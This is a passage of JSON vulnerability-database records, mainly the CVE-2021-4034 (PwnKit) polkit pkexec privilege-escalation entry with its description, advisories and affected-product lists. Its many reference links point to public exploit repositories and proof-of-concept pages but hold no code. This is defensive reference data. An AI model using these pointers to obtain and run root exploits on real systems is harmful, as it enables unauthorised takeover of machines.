"cpe:2.3:a:atlassian:confluence_server:8.4.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.3:*:*:*:*:*:*:*"
],
"_timestamp": "2025-08-26T00:22:25.386422501Z"
}
]
{
"index": "vulnerabilities",
"id_type": "cve",
"id": "CVE-2021-4034",
"request_time": 1668561961,
"results_count": 1,
"results": [
{
"cve": {
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
"ID": "CVE-2021-4034",
"ASSIGNER": "secalert@redhat.com",
"ALIAS": "PwnKit",
"STATUS": "Confirmed"
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-787",
"name": "Out-of-bounds Write",
"url": "https://cwe.mitre.org/data/definitions/787.html"
}
]
}
]
},
"references": {
"reference_data": [
{
"url": "https://packetstormsecurity.com/files/166196/Polkit-pkexec-Local-Privilege-Escalation.html",
"name": "Polkit pkexec Local Privilege Escalation",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-03-03"
},
{
"url": "https://github.com/fdellwing/CVE-2021-4034",
"name": "fdellwing/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/chenaotian/CVE-2021-4034",
"name": "chenaotian/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/navisec/CVE-2021-4034-PwnKit",
"name": "navisec/CVE-2021-4034-PwnKit exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-30"
},
{
"url": "https://github.com/v-rzh/CVE-2021-4034",
"name": "v-rzh/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-29"
},
{
"url": "https://github.com/Pixailz/CVE-2021-4034",
"name": "Pixailz/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-10-10"
},
{
"url": "https://github.com/zhzyker/CVE-2021-4034",
"name": "zhzyker/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://gitlab.com/RekGRpth/CVE-2021-4034",
"name": "RekGRpth/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-03-03"
},
{
"url": "https://github.com/rapid7/metasploit-framework",
"name": "Local Privilege Escalation in polkits pkexec",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/linux_pkexec_argc",
"name": "linux_pkexec_argc",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-05-01"
},
{
"url": "https://github.com/ck00004/CVE-2021-4034",
"name": "ck00004/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-02-15"
},
{
"url": "https://github.com/robemmerson/CVE-2021-4034",
"name": "robemmerson/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/joeammond/CVE-2021-4034",
"name": "joeammond/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/ayypril/CVE-2021-4034",
"name": "ayypril/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/clubby789/CVE-2021-4034",
"name": "clubby789/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/HrishitJoshi/CVE-2021-4034",
"name": "HrishitJoshi/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-02-02"
},
{
"url": "https://packetstormsecurity.com/files/165729/Polkit-pkexec-CVE-2021-4034-Local-Root.html",
"name": "Polkit pkexec CVE-2021-4034 Local Root",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://packetstormsecurity.com/files/165727/Polkit-pkexec-CVE-2021-4034-Local-Root.html",
"name": "Polkit pkexec CVE-2021-4034 Local Root",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/dadvlingd/-CVE-2021-4034",
"name": "dadvlingd/-CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/signfind/CVE-2021-4034",
"name": "signfind/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "0001-01-01"
},
{
"url": "https://github.com/dzonerzy/poc-cve-2021-4034",
"name": "dzonerzy/poc-cve-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/arthepsy/CVE-2021-4034",
"name": "arthepsy/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/ly4k/PwnKit",
"name": "ly4k/PwnKit exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/Ankit-Ojha16/CVE-2021-4034",
"name": "Ankit-Ojha16/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-02-02"
},
{
"url": "https://github.com/mtthwstffrd/berdav-CVE-2021-4034",
"name": "mtthwstffrd/berdav-CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-03-23"
},
{
"url": "https://packetstormsecurity.com/files/165739/PolicyKit-1-0.105-31-Privilege-Escalation.html",
"name": "PolicyKit-1 0.105-31 Privilege Escalation",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-27"
},
{
"url": "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json",
"name": "Red Hat Polkit Out-of-Bounds Read and Write Vulnerability",
"refsource": "CISA-KNOWN-EXPLOITED-VULNERABILITIES",
"tags": [
"US Government Resource",
"Third Party Advisory"
],
"date_added": "2022-06-27"
},
{
"url": "https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html",
"name": "Alchimist: A new attack framework in Chinese for Mac, Linux and Windows",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-10-13"
},
{
"url": "https://github.com/phvilasboas/CVE-2021-4034",
"name": "phvilasboas/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/Ayrx/CVE-2021-4034",
"name": "Ayrx/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/berdav/CVE-2021-4034",
"name": "berdav/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-25"
},
{
"url": "https://github.com/An00bRektn/CVE-2021-4034",
"name": "An00bRektn/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/EstamelGG/CVE-2021-4034-NoGCC",
"name": "EstamelGG/CVE-2021-4034-NoGCC exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-28"
},
{
"url": "https://github.com/Al1ex/CVE-2021-4034",
"name": "Al1ex/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-27"
},
{
"url": "https://gitlab.com/Tramadol/cve-2021-4034",
"name": "Tramadol/cve-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/x04000/CVE-2021-4034",
"name": "x04000/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-02-13"
},
{
"url": "https://packetstormsecurity.com/files/165728/Polkit-pkexec-CVE-2021-4034-Proof-Of-Concept.html",
"name": "Polkit pkexec CVE-2021-4034 Proof Of Concept",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://my.saintcorporation.com/cgi-bin/exploit_info/polkit_pkexec_priv_elev",
"name": "Polkit pkexec privilege elevation",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-27"
},
{
"url": "https://packetstormsecurity.com/files/166200/Polkit-pkexec-Privilege-Escalation.html",
"name": "Polkit pkexec Privilege Escalation",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-03-04"
},
{
"url": "https://github.com/Rvn0xsy/CVE-2021-4034",
"name": "Rvn0xsy/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-28"
},
{
"url": "https://github.com/CYB3RK1D/CVE-2021-4034-POC",
"name": "CYB3RK1D/CVE-2021-4034-POC exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-28"
},
{
"url": "https://github.com/OxWeb4/CVE-2021-4034-",
"name": "OxWeb4/CVE-2021-4034- exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-29"
},
{
"url": "https://github.com/nikaiw/CVE-2021-4034",
"name": "nikaiw/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/n3onhacks/CVE-2021-4034",
"name": "n3onhacks/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-28"
},
{
"url": "https://github.com/luijait/PwnKit-Exploit",
"name": "luijait/PwnKit-Exploit exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/san3ncrypt3d/CVE-2021-4034-POC",
"name": "san3ncrypt3d/CVE-2021-4034-POC exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/ryaagard/CVE-2021-4034",
"name": "ryaagard/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-25"
},
{
"url": "https://github.com/artemis-mike/cve-2021-4034",
"name": "artemis-mike/cve-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-26"
},
{
"url": "https://github.com/Hifumi1337/CVE-2021-4034",
"name": "Hifumi1337/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-03-16"
},
{
"url": "https://github.com/PwnFunction/CVE-2021-4034",
"name": "PwnFunction/CVE-2021-4034 exploit repository",
"refsource": "MISC",
"tags": [
"Exploit"
],
"date_added": "2022-01-27"
},
{
"url": "https://www.gehealthcare.com/en-US/security",
"status": "active",
"lang": "en",
"name": "PwnKit – Critical Polkit Vulnerability in Linux Distributions (CVE-2021-4034)",
"refsource": "GE-HEALTHCARE",
"tags": [
"IoMT",
"Vendor Advisory"
],
"date_added": "2022-02-04"
},
{
"url": "https://www.cisa.gov/uscert/ics/advisories/ICSA-22-167-16",
"status": "active",
"lang": "en",
"name": "Siemens SCALANCE LPE 4903 and SINUMERIK Edge",
"external_id": "ICSA-22-167-16",
"refsource": "ICS-CERT",
"tags": [
"ICS/OT"
],
"date_added": "2022-06-16"
},
{
"url": "https://ubuntu.com/security/CVE-2021-4034",
"status": "active",
"lang": "en",
"name": "Ubuntu security advisory for CVE-2021-4034",
"external_id": "USN-5252-1",
"refsource": "UBUNTU-CVE-TRACKER",
"tags": [
"Vendor Advisory"
],
"date_added": "2022-01-28"
},
{
"url": "https://ubuntu.com/security/CVE-2021-4034",
"status": "active",
"lang": "en",
"name": "Ubuntu security advisory for CVE-2021-4034",
"external_id": "USN-5252-2",
"refsource": "UBUNTU-CVE-TRACKER",
"tags": [
"Vendor Advisory"
],
"date_added": "2022-01-28"
},
{
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-167-16",
"status": "active",
"lang": "en",
"name": "Siemens SCALANCE LPE 4903 and SINUMERIK Edge",
"external_id": "icsa-22-167-16",
"refsource": "ICS-CERT",
"tags": [
"ICS/OT"
],
"date_added": "2022-06-16"
},
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-330556.pdf",
"status": "active",
"lang": "en",
"name": "PwnKit Vulnerability in SCALANCE LPE9403 and SINUMERIK Edge Products (CVE-2021-4034)",
"external_id": "SSA-330556",
"refsource": "SIEMENS",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-06-14"
},
{
"url": "https://www.debian.org/security/2022/dsa-5059",
"status": "active",
"lang": "en",
"name": "DSA-5059-1 policykit-1 -- security update",
"external_id": "DSA-5059",
"refsource": "DEBIAN-DSA",
"tags": [
"Vendor Advisory"
],
"date_added": "2022-01-25"
},
{
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001254&LanguageCode=en&DocumentPartId=&Action=Launch",
"status": "active",
"lang": "en",
"name": "",
"refsource": "ABB",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-04-11"
},
{
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001254&LanguageCode=en&DocumentPartId=&Action=Launch",
"status": "active",
"lang": "en",
"name": "",
"refsource": "ABB",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-04-11"
},
{
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001254&LanguageCode=en&Action=Launch",
"status": "active",
"lang": "en",
"name": "",
"refsource": "ABB",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-04-11"
},
{
"url": "https://www.cisa.gov/uscert/ics/advisories/ICSA-22-270-02",
"status": "active",
"lang": "en",
"name": "Hitachi Energy APM Edge",
"external_id": "ICSA-22-270-02",
"refsource": "ICS-CERT",
"tags": [
"ICS/OT"
],
"date_added": "2022-09-27"
},
{
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001254&LanguageCode=en&Action=Launch",
"status": "active",
"lang": "en",
"name": "",
"refsource": "ABB",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-04-11"
},
{
"url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001254&LanguageCode=en&Action=Launch&_ga=2.56758504.353589356.1650867075-372504397.1647012599",
"status": "active",
"lang": "en",
"name": "",
"refsource": "ABB",
"tags": [
"ICS/OT",
"Vendor Advisory"
],
"date_added": "2022-04-11"
},
{
"url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
"name": "CVE-2021-4034 exploited by DriftingCloud threat actor",
"refsource": "MISC",
"tags": []
},
{
"url": "https://www.trendmicro.com/en_us/research/22/e/patch-your-wso2-cve-2022-29464-exploited-to-install-linux-compatible-cobalt-strike-beacons-other-malware.html",
"name": "CVE-2021-4034 associated with Hezb botnet",
"refsource": "MISC",
"tags": []
},
{
"url": "https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/",
"name": "CVE-2021-4034 associated with Hezb botnet",
"refsource": "MISC",
"tags": []
},
{
"url": "https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations",
"name": "CVE-2021-4034 associated with Hezb botnet",
"refsource": "MISC",
"tags": []
},
{
"url": "https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt",
"name": "https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt",
"refsource": "MISC",
"tags": [
"Exploit",
"Mitigation",
"Third Party Advisory"
]
},
{
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2022-001",
"name": "https://access.redhat.com/security/vulnerabilities/RHSB-2022-001",
"refsource": "MISC",
"tags": [
"Mitigation",
"Vendor Advisory"
]
},
{
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2025869",
"name": "https://bugzilla.redhat.com/show_bug.cgi?id=2025869",
"refsource": "MISC",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
]
},
{
"url": "https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683",
"name": "https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683",
"refsource": "MISC",
"tags": [
"Patch",
"Third Party Advisory"
]
},
{
"url": "https://www.suse.com/support/kb/doc/?id=000020564",
"name": "https://www.suse.com/support/kb/doc/?id=000020564",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"name": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://www.starwindsoftware.com/security/sw-20220818-0001/",
"name": "https://www.starwindsoftware.com/security/sw-20220818-0001/",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
]
}
]
},
"categorization": {
"tags": [
"ICS/OT",
"IoMT",
"Operating System",
"IoT"
]
},
"description": {
"description_data": [
{
"lang": "en",
"value": "A local privilege escalation vulnerability was found in polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according to predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends up trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way that it induces pkexec to execute arbitrary code. When successfully executed, the attack can cause a local privilege escalation, giving unprivileged users administrative rights on the target machine."
}
]
}
},
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:polkit_project:polkit:*:*:*:*:*:*:*:*",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_scientific_computing:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.2:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.1:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:8.4:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.7:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.6:*:*:*:*:*:*:*",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:21.10:*:*:*:*:*:*:*",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:suse:manager_server:4.1:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:sp5:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_desktop:15:sp2:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:suse:enterprise_storage:7.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:suse:manager_proxy:4.1:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:suse:linux_enterprise_high_performance_computing:15.0:sp2:*:*:-:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:15:sp2:*:*:*:-:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:15:sp2:*:*:*:sap:*:*",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:oracle:http_server:12.2.1.3.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:oracle:http_server:12.2.1.4.0:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:siemens:sinumerik_edge:*:*:*:*:*:*:*:*",
"versionEndExcluding": "3.3.0",
"cpe_name": []
}
]
},
{
"operator": "AND",
"children": [
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:o:siemens:scalance_lpe9403_firmware:*:*:*:*:*:*:*:*",
"versionEndExcluding": "2.0",
"cpe_name": []
}
]
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": false,
"cpe23Uri": "cpe:2.3:h:siemens:scalance_lpe9403:-:*:*:*:*:*:*:*",
"cpe_name": []
}
]
}
],
"cpe_match": []
},
{
"operator": "OR",
"children": [],
"cpe_match": [
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:starwindsoftware:starwind_virtual_san:v8:build14338:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:starwindsoftware:starwind_hyperconverged_appliance:-:*:*:*:*:*:*:*",
"cpe_name": []
},
{
"vulnerable": true,
"cpe23Uri": "cpe:2.3:a:starwindsoftware:command_center:1.0:update3_build5871:*:*:*:*:*:*",
"cpe_name": []
}
]
}
]
},
"vulnerable_cpes": [
"cpe:2.3:a:oracle:http_server:12.2.1.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:http_server:12.2.1.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:-:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.100:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.101:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.102:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.103:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.104:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.105:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.106:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.107:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.108:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.109:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.110:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.111:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.112.1:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.112:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.113:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.114:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.115:*:*:*:*:*:*:*",
